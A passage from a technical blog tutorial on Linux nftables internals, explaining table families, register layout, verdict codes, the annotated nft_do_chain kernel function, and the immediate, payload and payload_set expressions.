The families are - <code class="language-plaintext highlighter-rouge">ip</code>, <code class="language-plaintext highlighter-rouge">ip6</code>, <code class="language-plaintext highlighter-rouge">inet</code>, <code class="language-plaintext highlighter-rouge">arp</code>, <code class="language-plaintext highlighter-rouge">bridge</code>, <code class="language-plaintext highlighter-rouge">netdev</code>.</p>

<p>Tables belonging to the families <code class="language-plaintext highlighter-rouge">ip</code> and <code class="language-plaintext highlighter-rouge">ip6</code> see only IPv4 and IPv6 packets respectively. The <code class="language-plaintext highlighter-rouge">inet</code> family allows a table to see both IPv4 and IPv6 packets.</p>

<p>The <code class="language-plaintext highlighter-rouge">arp</code> family allows tables to see ARP-level traffic while tables belonging to the <code class="language-plaintext highlighter-rouge">bridge</code> family only see packets traversing bridges.</p>

<p>The <code class="language-plaintext highlighter-rouge">netdev</code> family allows base chains to be attached to a particular network interface. Such base chains will then see <strong>all</strong> network traffic on that interface. That means that ARP traffic can be handled from here as well. The <code class="language-plaintext highlighter-rouge">netdev</code> family is only used when the base chains of the table will use the <code class="language-plaintext highlighter-rouge">ingress</code> hook but more on that later.</p>

<h3 id="expressions--">Expressions  <a name="expressions"></a></h3>
<p>Expressions are like little operations where you can pass the arguments. They perform actions on packets. Expressions, executed (or rather evaluated) one after another form a rule.
An example for an expression is the payload expression <code class="language-plaintext highlighter-rouge">nft_payload_expr</code>. It copies data from the packet’s headers and saves it into the <code class="language-plaintext highlighter-rouge">registers</code>. 
The registers are like a local data storage that you can write to and read from with expressions. They can be used to pass data between expressions.</p>

<p>So in conclusion: Expressions are operators we can use by providing them with arguments. Multiple expressions that will be evaluated one after the other form a rule. Multiple rules <em>chained</em> together form a chain.</p>
<blockquote>
  <p>Ex: If we have the rule udp dport 50001 drop
We first compare the protocol if it is udp with an expression
Then we check if the destination port is 50001 with another expression
and then if both are true we use another expression to <em>drop</em> the package - by setting a verdict</p>
</blockquote>

<h2 id="registers-">Registers <a name="registers"></a></h2>
<p>We will now take a look at a very essential part - The Registers.
Registers store data in them. That data can be accessed or modified by expressions by targetting a specific <em>register</em>.
Although registers can be viewed as separate it is most of the time useful to see them as one continuous buffer of data where the <em>register index</em> is just an offset of the buffer.</p>

<p>But how much data can we store in the registers? That part might be a little bit confusing</p>

<p>Originally there were five <em>16 byte</em> registers. One <strong>verdict</strong> register and four data registers - each is 16 bytes. In total 80 bytes.</p>
<blockquote>
  <p>Verdict (16) + 4 * data (16) = 80</p>
</blockquote>

<p>But now stuff is a little different - there is still one 16 byte register - <strong>the verdict register</strong> but now the data registers can be addressed as <strong>sixteen</strong> each 4 bytes.</p>
<blockquote>
  <p>Verdict(16) + 16 * data (4) = 80</p>
</blockquote>

<h3 id="data-registers-">Data registers <a name="dataregs"></a></h3>
<p>So the data registers used to be four - each 16 bytes. Now they are sixteen - each 4 bytes.</p>

<p>We can view the registers as one continuous buffer of data where the <em>registers</em> are just offsets in that buffer.
Well that would mean we just have two types of offsets. The first type is every 16 bytes. The second type is every 4 bytes.</p>

<p>Lets take a look at the register’s enum type - it defines the offsets.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">enum</span> <span class="n">nft_registers</span> <span class="p">{</span>
	<span class="n">NFT_REG_VERDICT</span><span class="p">,</span>
	<span class="n">NFT_REG_1</span><span class="p">,</span>
	<span class="n">NFT_REG_2</span><span class="p">,</span>
	<span class="n">NFT_REG_3</span><span class="p">,</span>
	<span class="n">NFT_REG_4</span><span class="p">,</span>
	<span class="n">__NFT_REG_MAX</span><span class="p">,</span>

	<span class="n">NFT_REG32_00</span>	<span class="o">=</span> <span class="mi">8</span><span class="p">,</span>
	<span class="n">NFT_REG32_01</span><span class="p">,</span>
	<span class="n">NFT_REG32_02</span><span class="p">,</span>
	<span class="p">...</span>
	<span class="n">NFT_REG32_13</span><span class="p">,</span>
	<span class="n">NFT_REG32_14</span><span class="p">,</span>
	<span class="n">NFT_REG32_15</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">NFT_REG_1</code> to <code class="language-plaintext highlighter-rouge">NFT_REG_4</code> are the 16 byte offsets while <code class="language-plaintext highlighter-rouge">NFT_REG32_00</code> to <code class="language-plaintext highlighter-rouge">NFT_REG32_15</code> are the <em>4 byte ones</em>.</p>

<p><img src="https://i.imgur.com/93aKEAi.png" alt="regs_schematic.png" /></p>

<p>We mentioned multiple times the <em>verdict register</em>. So lets talk about it.</p>

<h3 id="verdict-register-">Verdict register <a name="verdictreg"></a></h3>
<p>The verdict register sits at <strong>offset</strong> zero in the registers. The size of the verdict register is 16 bytes. During each rule a verdict can be set for the packet. The verdict can be set to the following values:</p>
<ol>
  <li><code class="language-plaintext highlighter-rouge">NFT_CONTINUE</code> - reached after the chain is executed fully. Allows the packet through the firewall. The default verdict. If the verdict is set to anything but this -&gt; no more expressions will be executed in the rule. Depending on the verdict that might mean that we just continue down the other rules, go to another chain or completely drop the packet.</li>
  <li><code class="language-plaintext highlighter-rouge">NFT_BREAK</code> - the rest of the expressions in the rules are <em>skipped</em> but then it goes down the rules in the chain normally.</li>
  <li><code class="language-plaintext highlighter-rouge">NF_DROP</code> - drop the packet - no more expressions will be performed.</li>
  <li><code class="language-plaintext highlighter-rouge">NF_ACCEPT</code> - accepts the packet preemptively.</li>
  <li><code class="language-plaintext highlighter-rouge">NFT_GOTO</code> - go to another chain and go through the rules there. It does not return to the current chain.</li>
  <li><code class="language-plaintext highlighter-rouge">NFT_JUMP</code> - jump to another chain and after going through the rules there if the verdict there is <code class="language-plaintext highlighter-rouge">NF_CONTINUE</code> it allows the packet to return to the original chain and continue with the rules in it.
    <blockquote>
      <p>Verdicts like NF_DROP and NF_ACCEPT (and the unmentioned NF_STOLEN and NF_QUEUE) just return that code to the caller for them to decide to do with the packet.</p>
    </blockquote>
  </li>
</ol>

<p>Or the verdict can be set to <em>jump</em> which means that now the execution will jump to another chain in the table and the rules in that chain will be checked against our packet going through the firewall.
So the verdict register controls the <em>fate</em> of our packet - where it goes through and finally if it is allowed or not. Or we can say that the verdict controls the execution flow.</p>

<p>However, the internal structure of the verdict register is I fear a little bit more confusing.
As we said it is <code class="language-plaintext highlighter-rouge">16 bytes</code>. The first <em>4 bytes</em> are the actual <strong>verdict</strong>. Those 4 bytes take the codes we just talked about.
The other <code class="language-plaintext highlighter-rouge">12 bytes</code> are used if the verdict is <code class="language-plaintext highlighter-rouge">NF_JUMP</code> or <code class="language-plaintext highlighter-rouge">NF_GOTO</code> and they point to the other chain.</p>

<h2 id="taking-a-quick-look-at-nft_do_chain-">Taking a quick look at nft_do_chain <a name="quicklook"></a></h2>
<p>Now that we established what the main building blocks are - expressions, rules, chains and tables and we talked a bit about how the execution flow is controlled - through verdicts. Lets now actually take a look at <code class="language-plaintext highlighter-rouge">nft_do_chain</code> - the function that actually goes through the rules in a chain and executes their expressions. We will be taking a look at the snippet containing the code of the function with some added comments to explain its behavior…</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">unsigned</span> <span class="kt">int</span>
<span class="nf">nft_do_chain</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_pktinfo</span> <span class="o">*</span><span class="n">pkt</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">priv</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">const</span> <span class="k">struct</span> <span class="n">nft_chain</span> <span class="o">*</span><span class="n">chain</span> <span class="o">=</span> <span class="n">priv</span><span class="p">,</span> <span class="o">*</span><span class="n">basechain</span> <span class="o">=</span> <span class="n">chain</span><span class="p">;</span>
	<span class="k">const</span> <span class="k">struct</span> <span class="n">nft_rule_dp</span> <span class="o">*</span><span class="n">rule</span><span class="p">,</span> <span class="o">*</span><span class="n">last_rule</span><span class="p">;</span>
	<span class="k">const</span> <span class="k">struct</span> <span class="n">net</span> <span class="o">*</span><span class="n">net</span> <span class="o">=</span> <span class="n">nft_net</span><span class="p">(</span><span class="n">pkt</span><span class="p">);</span>
	<span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">,</span> <span class="o">*</span><span class="n">last</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">nft_regs</span> <span class="n">regs</span> <span class="o">=</span> <span class="p">{};</span>
	<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">stackptr</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">nft_jumpstack</span> <span class="n">jumpstack</span><span class="p">[</span><span class="n">NFT_JUMP_STACK_SIZE</span><span class="p">];</span>
	<span class="n">bool</span> <span class="n">genbit</span> <span class="o">=</span> <span class="n">READ_ONCE</span><span class="p">(</span><span class="n">net</span><span class="o">-&gt;</span><span class="n">nft</span><span class="p">.</span><span class="n">gencursor</span><span class="p">);</span>
	<span class="k">struct</span> <span class="n">nft_rule_blob</span> <span class="o">*</span><span class="n">blob</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">nft_traceinfo</span> <span class="n">info</span><span class="p">;</span>

	<span class="n">info</span><span class="p">.</span><span class="n">trace</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">static_branch_unlikely</span><span class="p">(</span><span class="o">&amp;</span><span class="n">nft_trace_enabled</span><span class="p">))</span>
		<span class="n">nft_trace_init</span><span class="p">(</span><span class="o">&amp;</span><span class="n">info</span><span class="p">,</span> <span class="n">pkt</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">regs</span><span class="p">.</span><span class="n">verdict</span><span class="p">,</span> <span class="n">basechain</span><span class="p">);</span>
<span class="nl">do_chain:</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">genbit</span><span class="p">)</span>
		<span class="n">blob</span> <span class="o">=</span> <span class="n">rcu_dereference</span><span class="p">(</span><span class="n">chain</span><span class="o">-&gt;</span><span class="n">blob_gen_1</span><span class="p">);</span>
	<span class="k">else</span>
		<span class="n">blob</span> <span class="o">=</span> <span class="n">rcu_dereference</span><span class="p">(</span><span class="n">chain</span><span class="o">-&gt;</span><span class="n">blob_gen_0</span><span class="p">);</span>

	<span class="n">rule</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">nft_rule_dp</span> <span class="o">*</span><span class="p">)</span><span class="n">blob</span><span class="o">-&gt;</span><span class="n">data</span><span class="p">;</span>
	<span class="cm">/* we get the last rule so we know when to stop the processing */</span>
	<span class="n">last_rule</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">blob</span><span class="o">-&gt;</span><span class="n">data</span> <span class="o">+</span> <span class="n">blob</span><span class="o">-&gt;</span><span class="n">size</span><span class="p">;</span>
<span class="nl">next_rule:</span> <span class="c1">// this section is executed every time there is a rule</span>
	<span class="n">regs</span><span class="p">.</span><span class="n">verdict</span><span class="p">.</span><span class="n">code</span> <span class="o">=</span> <span class="n">NFT_CONTINUE</span><span class="p">;</span> <span class="c1">// the default verdict code = NFT_CONTINUE</span>
	<span class="k">for</span> <span class="p">(;</span> <span class="n">rule</span> <span class="o">&lt;</span> <span class="n">last_rule</span><span class="p">;</span> <span class="n">rule</span> <span class="o">=</span> <span class="n">nft_rule_next</span><span class="p">(</span><span class="n">rule</span><span class="p">))</span> <span class="p">{</span> <span class="c1">// iterate through the rules</span>
		<span class="cm">/* iterate through the expressions */</span>
		<span class="n">nft_rule_dp_for_each_expr</span><span class="p">(</span><span class="n">expr</span><span class="p">,</span> <span class="n">last</span><span class="p">,</span> <span class="n">rule</span><span class="p">)</span> <span class="p">{</span>
			<span class="c1">// execute the expression</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span> <span class="o">==</span> <span class="o">&amp;</span><span class="n">nft_cmp_fast_ops</span><span class="p">)</span>
				<span class="n">nft_cmp_fast_eval</span><span class="p">(</span><span class="n">expr</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">regs</span><span class="p">);</span>
			<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span> <span class="o">==</span> <span class="o">&amp;</span><span class="n">nft_cmp16_fast_ops</span><span class="p">)</span>
				<span class="n">nft_cmp16_fast_eval</span><span class="p">(</span><span class="n">expr</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">regs</span><span class="p">);</span>
			<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span> <span class="o">==</span> <span class="o">&amp;</span><span class="n">nft_bitwise_fast_ops</span><span class="p">)</span>
				<span class="n">nft_bitwise_fast_eval</span><span class="p">(</span><span class="n">expr</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">regs</span><span class="p">);</span>
			<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span> <span class="o">!=</span> <span class="o">&amp;</span><span class="n">nft_payload_fast_ops</span> <span class="o">||</span>
				 <span class="o">!</span><span class="n">nft_payload_fast_eval</span><span class="p">(</span><span class="n">expr</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">regs</span><span class="p">,</span> <span class="n">pkt</span><span class="p">))</span>
				<span class="n">expr_call_ops_eval</span><span class="p">(</span><span class="n">expr</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">regs</span><span class="p">,</span> <span class="n">pkt</span><span class="p">);</span>
			<span class="cm">/* if the code is anything but continue stop going through the expresions in that rule */</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">regs</span><span class="p">.</span><span class="n">verdict</span><span class="p">.</span><span class="n">code</span> <span class="o">!=</span> <span class="n">NFT_CONTINUE</span><span class="p">)</span> 
				<span class="k">break</span><span class="p">;</span>
		<span class="p">}</span>

		<span class="cm">/* section where it makes decisions what to do based on verdict */</span>
		<span class="k">switch</span> <span class="p">(</span><span class="n">regs</span><span class="p">.</span><span class="n">verdict</span><span class="p">.</span><span class="n">code</span><span class="p">)</span> <span class="p">{</span> 
		<span class="k">case</span> <span class="n">NFT_BREAK</span><span class="p">:</span> 
			<span class="c1">// if NFT_BREAK -&gt; set verdict back to continue and continue</span>
			<span class="c1">// with the next rule on the chain</span>
			<span class="c1">// NFT_BREAK just stops execution of the expressions in one rule</span>
			<span class="c1">// and skips the rest of the expressions in the rule</span>
			<span class="c1">// after that it continues down the rules normally as if NFT_CONTINUE</span>
			<span class="n">regs</span><span class="p">.</span><span class="n">verdict</span><span class="p">.</span><span class="n">code</span> <span class="o">=</span> <span class="n">NFT_CONTINUE</span><span class="p">;</span>
			<span class="n">nft_trace_copy_nftrace</span><span class="p">(</span><span class="n">pkt</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">info</span><span class="p">);</span>
			<span class="k">continue</span><span class="p">;</span>
		<span class="k">case</span> <span class="n">NFT_CONTINUE</span><span class="p">:</span>
			<span class="c1">// if we hit this that means we went through all the expressions</span>
			<span class="c1">// if NFT_CONTINUE -&gt; we successfully went through the expressions </span>
			<span class="c1">// in the rule and we can continue to the next rule</span>
			<span class="n">nft_trace_packet</span><span class="p">(</span><span class="n">pkt</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">info</span><span class="p">,</span> <span class="n">chain</span><span class="p">,</span> <span class="n">rule</span><span class="p">,</span>
					 <span class="n">NFT_TRACETYPE_RULE</span><span class="p">);</span>
			<span class="k">continue</span><span class="p">;</span>
		<span class="p">}</span>
		<span class="cm">/* If not NFT_BREAK and not NFT_CONTINUE we know we will be exiting the chain */</span>
		<span class="cm">/* no more rules will be checked in that chain */</span>
		<span class="k">break</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="n">nft_trace_verdict</span><span class="p">(</span><span class="o">&amp;</span><span class="n">info</span><span class="p">,</span> <span class="n">chain</span><span class="p">,</span> <span class="n">rule</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">regs</span><span class="p">);</span>

	<span class="cm">/* We hit the switches below after we finish with a chain */</span>
	<span class="cm">/* could be through a graceful exit or through a verdict prematurely set */</span>
	<span class="k">switch</span> <span class="p">(</span><span class="n">regs</span><span class="p">.</span><span class="n">verdict</span><span class="p">.</span><span class="n">code</span> <span class="o">&amp;</span> <span class="n">NF_VERDICT_MASK</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">case</span> <span class="n">NF_ACCEPT</span><span class="p">:</span>
	<span class="k">case</span> <span class="n">NF_DROP</span><span class="p">:</span>
	<span class="k">case</span> <span class="n">NF_QUEUE</span><span class="p">:</span>
	<span class="k">case</span> <span class="n">NF_STOLEN</span><span class="p">:</span>
		<span class="c1">// if NF_ACCEPT, NF_DROP, NF_QUEUE or NF_STOLEN we just exit the function</span>
		<span class="c1">// returning the verdict to the caller </span>
		<span class="k">return</span> <span class="n">regs</span><span class="p">.</span><span class="n">verdict</span><span class="p">.</span><span class="n">code</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="cm">/* This switch is a responsible for the -control flow- */</span>
	<span class="cm">/* It determines through the verdict what to do with the execution */</span>
	<span class="cm">/* Here JUMPs and GOTOs are performed */</span>
	<span class="k">switch</span> <span class="p">(</span><span class="n">regs</span><span class="p">.</span><span class="n">verdict</span><span class="p">.</span><span class="n">code</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">case</span> <span class="n">NFT_JUMP</span><span class="p">:</span> 
		<span class="cm">/* If NFT_JUMP we just set up stuff for a jump - expecting to return */</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">WARN_ON_ONCE</span><span class="p">(</span><span class="n">stackptr</span> <span class="o">&gt;=</span> <span class="n">NFT_JUMP_STACK_SIZE</span><span class="p">))</span>
			<span class="k">return</span> <span class="n">NF_DROP</span><span class="p">;</span>
		<span class="n">jumpstack</span><span class="p">[</span><span class="n">stackptr</span><span class="p">].</span><span class="n">chain</span> <span class="o">=</span> <span class="n">chain</span><span class="p">;</span>
		<span class="n">jumpstack</span><span class="p">[</span><span class="n">stackptr</span><span class="p">].</span><span class="n">rule</span> <span class="o">=</span> <span class="n">nft_rule_next</span><span class="p">(</span><span class="n">rule</span><span class="p">);</span>
		<span class="n">jumpstack</span><span class="p">[</span><span class="n">stackptr</span><span class="p">].</span><span class="n">last_rule</span> <span class="o">=</span> <span class="n">last_rule</span><span class="p">;</span>
		<span class="n">stackptr</span><span class="o">++</span><span class="p">;</span>
		<span class="n">fallthrough</span><span class="p">;</span>
	<span class="k">case</span> <span class="n">NFT_GOTO</span><span class="p">:</span>
		<span class="cm">/* If NFT_GOTO we just goto the other chain - not expecting to return */</span>
		<span class="c1">// the previous case fallsthrough to this one to perform the jump to another chain</span>
		<span class="c1">// while NFT_GOTO skips the preparation because it won't be returning to this chain</span>
		<span class="n">chain</span> <span class="o">=</span> <span class="n">regs</span><span class="p">.</span><span class="n">verdict</span><span class="p">.</span><span class="n">chain</span><span class="p">;</span>
		<span class="k">goto</span> <span class="n">do_chain</span><span class="p">;</span>
	<span class="k">case</span> <span class="n">NFT_CONTINUE</span><span class="p">:</span> <span class="c1">// if gone through the rules with no other verdict</span>
	<span class="k">case</span> <span class="n">NFT_RETURN</span><span class="p">:</span> <span class="c1">// if returned from a chain early</span>
		<span class="cm">/* If the case is NFT_CONTINUE or NFT_RETURN */</span>
		<span class="cm">/* work with that chain is finished */</span>
		<span class="k">break</span><span class="p">;</span>
	<span class="nl">default:</span>
		<span class="n">WARN_ON_ONCE</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">nft_base_chain</span><span class="p">(</span><span class="n">basechain</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">policy</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<h2 id="the-expressions-">The Expressions <a name="expressions2"></a></h2>
<p>As we said expressions perform some action on packets or registers.</p>

<p>An important thing to talk about is the operations and structure of expressions.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr_ops</span> <span class="n">nft_imm_ops</span> <span class="o">=</span> <span class="p">{</span>
	<span class="p">.</span><span class="n">type</span>		<span class="o">=</span> <span class="o">&amp;</span><span class="n">nft_imm_type</span><span class="p">,</span> <span class="c1">// the expression type</span>
	<span class="p">.</span><span class="n">size</span>		<span class="o">=</span> <span class="n">NFT_EXPR_SIZE</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_immediate_expr</span><span class="p">)),</span>
	<span class="p">.</span><span class="n">eval</span>		<span class="o">=</span> <span class="n">nft_immediate_eval</span><span class="p">,</span> <span class="c1">// called when the expression is 'ran'</span>
	<span class="p">.</span><span class="n">init</span>		<span class="o">=</span> <span class="n">nft_immediate_init</span><span class="p">,</span> <span class="c1">// called when added with a rule</span>
	<span class="p">.</span><span class="n">activate</span>	<span class="o">=</span> <span class="n">nft_immediate_activate</span><span class="p">,</span>
	<span class="p">.</span><span class="n">deactivate</span>	<span class="o">=</span> <span class="n">nft_immediate_deactivate</span><span class="p">,</span>
	<span class="p">.</span><span class="n">destroy</span>	<span class="o">=</span> <span class="n">nft_immediate_destroy</span><span class="p">,</span>
	<span class="p">.</span><span class="n">dump</span>		<span class="o">=</span> <span class="n">nft_immediate_dump</span><span class="p">,</span>
	<span class="p">.</span><span class="n">validate</span>	<span class="o">=</span> <span class="n">nft_immediate_validate</span><span class="p">,</span>
	<span class="p">.</span><span class="n">reduce</span>		<span class="o">=</span> <span class="n">nft_immediate_reduce</span><span class="p">,</span>
	<span class="p">.</span><span class="n">offload</span>	<span class="o">=</span> <span class="n">nft_immediate_offload</span><span class="p">,</span>
	<span class="p">.</span><span class="n">offload_action</span>	<span class="o">=</span> <span class="n">nft_immediate_offload_action</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>
<p>Every time a rule is added - the <code class="language-plaintext highlighter-rouge">init</code> function of all of its expressions is called to make sure the data passed to the expressions is valid. Whenever an expression is <em>ran</em> its <code class="language-plaintext highlighter-rouge">eval</code> function is called - the function actually performing the expression. And so on and so forth.</p>

<p>This is how each expression is <em>defined</em> in the codebase.
Let’s actually take a look at the most commonly used expressions and expain how they can be used.</p>

<h3 id="nft_immediate_expr-">nft_immediate_expr <a name="nft_immediate_expr"></a></h3>
<p>This expression is probably the most simple one. It gets constant data and puts it into the registers. That’s all it does. 
It is most often used to set the verdict register.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_immediate_expr</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">nft_data</span>		<span class="n">data</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">dreg</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">dlen</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>It needs a <code class="language-plaintext highlighter-rouge">dreg</code> - a destination register and a <code class="language-plaintext highlighter-rouge">dlen</code> - the destination length. The first parameter <code class="language-plaintext highlighter-rouge">dreg</code> is the offset at which the data is going to be written. The second parameter <code class="language-plaintext highlighter-rouge">dlen</code> just shows the length of the data being written.</p>

<p>The constant data is also passed with the paremeter <code class="language-plaintext highlighter-rouge">data</code> of type <code class="language-plaintext highlighter-rouge">struct nft_data</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* include/net/netfilter/nf_tables.h */</span>
<span class="k">struct</span> <span class="n">nft_data</span> <span class="p">{</span>
	<span class="k">union</span> <span class="p">{</span>
		<span class="n">u32</span>			<span class="n">data</span><span class="p">[</span><span class="mi">4</span><span class="p">];</span>
		<span class="k">struct</span> <span class="n">nft_verdict</span>	<span class="n">verdict</span><span class="p">;</span>
	<span class="p">};</span>
<span class="p">}</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="n">__alignof__</span><span class="p">(</span><span class="n">u64</span><span class="p">))));</span>
</code></pre></div></div>
<p>We can see that <code class="language-plaintext highlighter-rouge">nft_data</code> can hold either a verdict or 16 bytes of data.
So with <code class="language-plaintext highlighter-rouge">nft_immediate_expr</code> we can set a verdict or write up to 16 bytes of arbitary data to the registers.</p>

<h3 id="nft_payload-">nft_payload <a name="nft_payload"></a></h3>
<p>This expression is another essential one. It is used to copy from the packets to the registers.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_payload</span> <span class="p">{</span>
	<span class="k">enum</span> <span class="n">nft_payload_bases</span>	<span class="n">base</span><span class="o">:</span><span class="mi">8</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">offset</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">len</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">dreg</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The first parameter here is a <code class="language-plaintext highlighter-rouge">base</code>. The type is <code class="language-plaintext highlighter-rouge">enum nft_payload_bases</code> so let us take take a look at it.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* include/uapi/linux/netfilter/nf_tables.h */</span>
<span class="cm">/**
 * enum nft_payload_bases - nf_tables payload expression offset bases
 *
 * @NFT_PAYLOAD_LL_HEADER: link layer header
 * @NFT_PAYLOAD_NETWORK_HEADER: network header
 * @NFT_PAYLOAD_TRANSPORT_HEADER: transport header
 * @NFT_PAYLOAD_INNER_HEADER: inner header / payload
 */</span>
<span class="k">enum</span> <span class="n">nft_payload_bases</span> <span class="p">{</span>
	<span class="n">NFT_PAYLOAD_LL_HEADER</span><span class="p">,</span>
	<span class="n">NFT_PAYLOAD_NETWORK_HEADER</span><span class="p">,</span>
	<span class="n">NFT_PAYLOAD_TRANSPORT_HEADER</span><span class="p">,</span>
	<span class="n">NFT_PAYLOAD_INNER_HEADER</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>
<p>So the bases we could use target headers at the different OSI levels. 
The second parameter we have in the <code class="language-plaintext highlighter-rouge">nft_payload</code> is <code class="language-plaintext highlighter-rouge">offset</code> - it defines the offset at which we start copying from, <strong>relative</strong> to the base provided. For example, in the UDP header the destination port is at offset 2 bytes from the start of the UDP header. So to copy the destination port we would use the <code class="language-plaintext highlighter-rouge">NFT_PAYLOAD_TRANSPORT_HEADER</code> base and <code class="language-plaintext highlighter-rouge">offset = 2</code>.
The third parameter we have is the <code class="language-plaintext highlighter-rouge">len</code> parameter. It just specifies the amount of bytes we are going to be copying.
The fourth parameter is <code class="language-plaintext highlighter-rouge">dreg</code> which specifies to which register we are going to be copying.
So lets have an example - If we want to copy the TCP checksum to the third <strong>small register</strong> (small = 4-byte one) we are going to set the values of the expression to:</p>
<pre><code class="language-txt">base = NFT_PAYLOAD_TRANSPORT_HEADER
offset = 16 -&gt; the checksum is 16 bytes away from the start of the TCP header
len = 2 -&gt; the checksum is 2 bytes
dreg = NFT_REG32_02 (the small registers start frrom NFT_REG32_00)
</code></pre>

<h3 id="nft_payload_set-">nft_payload_set <a name="nft_payload_set"></a></h3>
<p>This expression is the opposite of <code class="language-plaintext highlighter-rouge">nft_payload</code>. Instead of copying from the headers to the registers, we can use <code class="language-plaintext highlighter-rouge">nft_payload_set</code> to copy from the registers <strong>to</strong> the headers.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* include/net/netfilter/nf_tables_core.h */</span>
<span class="k">struct</span> <span class="n">nft_payload_set</span> <span class="p">{</span>
	<span class="k">enum</span> <span class="n">nft_payload_bases</span>	<span class="n">base</span><span class="o">:</span><span class="mi">8</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">offset</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">len</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">sreg</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">csum_type</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">csum_offset</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">csum_flags</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>We provide a <code class="language-plaintext highlighter-rouge">base</code> which specifies what type of header we target (at what OSI level). The <code class="language-plaintext highlighter-rouge">offset</code> parameter specifies at what offset we are going to write relative to the beginning of the header and <code class="language-plaintext highlighter-rouge">len</code> shows how many bytes we are going to be copying from the registers to the packet. The last essential argument is <code class="language-plaintext highlighter-rouge">sreg</code> which holds the register offset from which we are going to copy <code class="language-plaintext highlighter-rouge">len</code> bytes.</p>

<p>We also have some <em>optional</em> checksum parameters.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* include/uapi/linux/netfilter/nf_tables.h */</span>
<span class="cm">/**
 * enum nft_payload_csum_types - nf_tables payload expression checksum types
 *
 * @NFT_PAYLOAD_CSUM_NONE: no checksumming
 * @NFT_PAYLOAD_CSUM_INET: internet checksum (RFC 791)
 * @NFT_PAYLOAD_CSUM_SCTP: CRC-32c, for use in SCTP header (RFC 3309)
 */</span>
<span class="k">enum</span> <span class="n">nft_payload_csum_types</span> <span class="p">{</span>
	<span class="n">NFT_PAYLOAD_CSUM_NONE</span><span class="p">,</span>
	<span class="n">NFT_PAYLOAD_CSUM_INET</span><span class="p">,</span>
	<span class="n">NFT_PAYLOAD_CSUM_SCTP</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>

<p>This expression allow us to directly modify the incoming packets before they reach the application layer or the outgoing ones before they leave the network. So for an example it could be used to redirect packets to different addresses or ports.</p>

